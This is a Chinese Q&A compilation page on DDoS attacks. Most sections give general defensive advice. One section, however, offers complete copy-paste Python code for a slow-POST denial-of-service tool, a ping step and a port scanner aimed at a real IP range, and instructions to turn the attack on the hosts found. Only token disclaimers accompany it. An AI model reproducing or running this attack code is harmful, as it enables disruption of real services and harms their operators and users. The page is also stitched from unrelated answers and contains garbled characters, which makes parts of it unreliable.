python防ddos攻击

㈠ ddos防御方法

ddos如何防御方法如下：

工具／原料：电脑华硕A456U，Windows7、端口。

1、可以使用Inexpress、Express、Forwarding等工具来过滤不必要的服务和端口，即在路由器上过滤假IP。

㈡ 如何进行DDOS攻击怎么做

会Python吗？下一个Python3.7.0-3.7.3,把代码复制下，粘贴即可

代码：

import socket

import time

import threading

#Pressure Test,ddos tool

#---------------------------

MAX_CONN=20000

PORT=80

HOST=".com"#在双引号里输入对方IP或域名，要保证他联网了或开机了，这里拿网络做示范（别运行！不然后果自负！！）

PAGE="/index.php"

#---------------------------

buf=("POST %s HTTP/1.1 "

"Host: %s "

"Content-Length: 10000000 "

"Cookie: dklkt_dos_test "

" " % (PAGE,HOST))

socks=[]

def conn_thread():

global socks

for i in range(0,MAX_CONN):

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:

s.connect((HOST,PORT))

s.send(buf.encode())

print ("Send buf OK!,conn=%d "%i)

socks.append(s)

except Exception as ex:

print ("Could not connect to server or send error:%s"%ex)

time.sleep(10)

#end def

def send_thread():

global socks

while True:

for s in socks:

try:

s.send("f".encode())

#print "send OK!"

except Exception as ex:

print ("Send Exception:%s "%ex)

socks.remove(s)

s.close()

time.sleep(1)

#end def

conn_th=threading.Thread(target=conn_thread,args=())

send_th=threading.Thread(target=send_thread,args=())

conn_th.start()

send_th.start()

如果你要攻击网站，以上代码虽然可行，但是，攻击效果很不好。

所以，最好用Windows里的PING进行检测

操作：

在Windows搜索栏里输入：cmd

输入：

ping -n 10 -l 1 .com

//这里拿网络做示范，别真打网络！

那么，就会发现，系统反映了：

正在 Ping .com [39.156.69.79] 具有 1 字节的数据:

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=29ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=26ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

来自 39.156.69.79 的回复: 字节=1 时间=27ms TTL=52

39.156.69.79 的 Ping 统计信息:

数据包: 已发送 = 10，已接收 = 10，丢失 = 0 (0% 丢失)，

往返行程的估计时间(以毫秒为单位):

最短 = 26ms，最长 = 29ms，平均 = 27ms

说明，网络的服务器有一个主服务器是39.156.69.79

那么，就来查找网络的所有服务器吧！

输入以下代码：

#绝大多数成功的网络攻击都是以端口扫描开始的，在网络安全和黑客领域，端口扫描是经常用到的技术，可以探测指定主机上是否

#开放了指定端口，进一步判断主机是否运行了某些重要的网络服务，最终判断是否存在潜在的安全漏洞，从一定意义上将也属于系统运维的范畴

#端口扫描器程序:模拟端口扫描器的工作原理，并采用多进程技术提高扫描速度

import socket

import sys

import multiprocessing

import time as t

def ports(ports_serve):

#获取常用端口对应的服务名称

for port in list(range(1,100))+[143,145,113,443,445,3389,8080]:

try:

ports_serve[port]=socket.getservbyport(port)

except socket.error:

pass

def ports_scan(host,ports_service):

ports_open=[]

try:

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#超时时间的不同会影响扫描结果的精确度

socket.timeout(0.01)

except socket.error:

print('socket creation error')

sys.exit()

for port in ports_service:

try:

#尝试连接指定端口

sock.connect((host,port))

#记录打开的端口

ports_open.append(port)

sock.close()

except socket.error:

pass

return ports_open

if __name__ == '__main__':

m=multiprocessing.Manager()

ports_service=dict()

results=dict()

ports(ports_service)

#创建进程池，允许最多8个进程同时运行

pool = multiprocessing.Pool(processes=8)

net = '39.156.69.'#后面的IP少一个，因为要扫描这段区域内的IP，从而进行攻击

for host_number in map(str,range(8,10)):

host = net + host_number

#创建一个新进程，同时记录其运行结果

results[host] = pool.apply_async(ports_scan,(host,ports_service))

print('starting '+host+'...')

#关闭进程池，close()必须在join()之前调用

pool.close()

#等待进程池中的进程全部执行结束

pool.join()

#打印输出结果

for host in results:

print('='*30)

print(host,'.'*10)

for port in results[host].get():

print(port,':',ports_service[port])

你会发现，Python反映了：

starting 39.156.69.8...

starting 39.156.69.9...

//并不是指网络只有这两个服务器！而是我们目前只能扫描到两个！

接着，运行DDoS攻击程序，把IP分别改为39.156.69.8和39.156.69.9

就可以实现DDoS攻击了。

//注：请不要用于违法用途，并且不要随意进行攻击。如想使用，可攻击虚拟机，但不要攻击外网IP和域名！！！

㈢ 服务器防御ddos的方法

服务器防止 DDoS 攻击的方法包括但哗咐芹不限于：

1、全面综合地设计网络的安全体系，注意所使用的安全产品和网络设备。

2、提高网络管理人员的素质，关注安全信息，遵从有关安全措施，及时地升级系统，加强系统抗击攻击的能力。

3、在系统中加装防火墙系统，利用防火墙系统对所有出入的数据包进行过滤，检查边界简岩安全规则，确保输出的包受到正确限制。

4、优化路由及网络结构。对路由器进行合理设置，降低攻击的可能性。

5、优化对外提供服务的主机，对所有在网上提供公开服务的主机都加以限制。

6、安装入侵检测工具（如 NIPC、NGREP），经常扫描检查系统，解决系统的漏洞，对系统文件和应用程序进行加密，并定期检查这些文件的变化。

在响应方面，虽然还没有很好的对付攻击行为的方法，但仍然可以采取措施使攻击的影响降至最小。对于提供信息服务的主机系统，应对的根本原则是：

尽可能地保持服务、迅速恢复服务。由于分布式攻击入侵网络上的大量机器和网络设备，所以要对付这种攻击归根到底还是要解决网络的整体安全问题乱毕。

真正解决安全问题一定要多个部门的配合，从边缘设备到骨干网络都要认真做好防范攻击的准备，一旦发现攻击就要及时地掐断最近攻击来源的那个路径，限制攻击力度的无限增强。

网络用户、管理者以及 ISP 之间应经常交流，共同制订计划，提高整个网络的安全性。

以上内容参考：网络-分布式拒绝服务攻击

㈣ 服务器被ddos攻击如何防御

首先，用户要去尝试了解攻击来自于何处，原因是黑客在攻击时所调用的IP地址并不一定是真实的，一旦掌握了真实的地址段，可以找到相应的码段进行隔离，或者临时过滤。同时，如果连接核心网的端口数量有限，也可以将端口进行屏蔽。
相较被攻击之后的疲于应对，有完善的安全机制无疑要更好。有些人可能会选择大规模部署网络基础设施，但这种办法只能拖延黑客的攻击进度，并不能解决问题。与之相比的话，还不如去“屏蔽”那些区域性或者说临时性的地址段，减少受攻击的风险面。
此外，还可以在骨干网、核心网的节点设置防护墙，这样在遇到大规模攻击时，可以让主机减少被直接攻击的可能。考虑到核心节点的带宽通常较高，容易成为黑客重点攻击的位置，所以定期扫描现有的主节点，发现可能导致风险的漏洞，就变得非常重要。

㈤ 什么是DDOS攻击如何防御攻击

DDoS攻击就是分布式拒绝服务攻击，指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，可使目标服务器进入瘫痪状态。

简单点说，就是你家摆摊卖咸鸭蛋呢，我找一堆二流子围着你家的咸鸭蛋摊问东问西，就是不买东西，或者买了东西，又说咸鸭蛋不好得退货。让真正想买咸鸭蛋的人买不到，让你家正常的业务没法进行。

防御：

1、尽可能对系统加载最新补丁，并采取有效的合规性配置，降低漏洞利用风险；

2、采取合适的安全域划分，配置防火墙、入侵检测和防范系统，减缓攻击。

3、采用分布式组网、负载均衡、提升系统容量等可靠性措施，增强总体服务能力。通俗的说就是，我找保安帮我维持鸭蛋摊的秩序，长得就不像是好人，举止怪异的根本不让靠近，并且在鸭蛋摊前面画条线排队，每个人只能有半分钟的买鸭蛋的时间，并且多开几个窗口卖鸭蛋。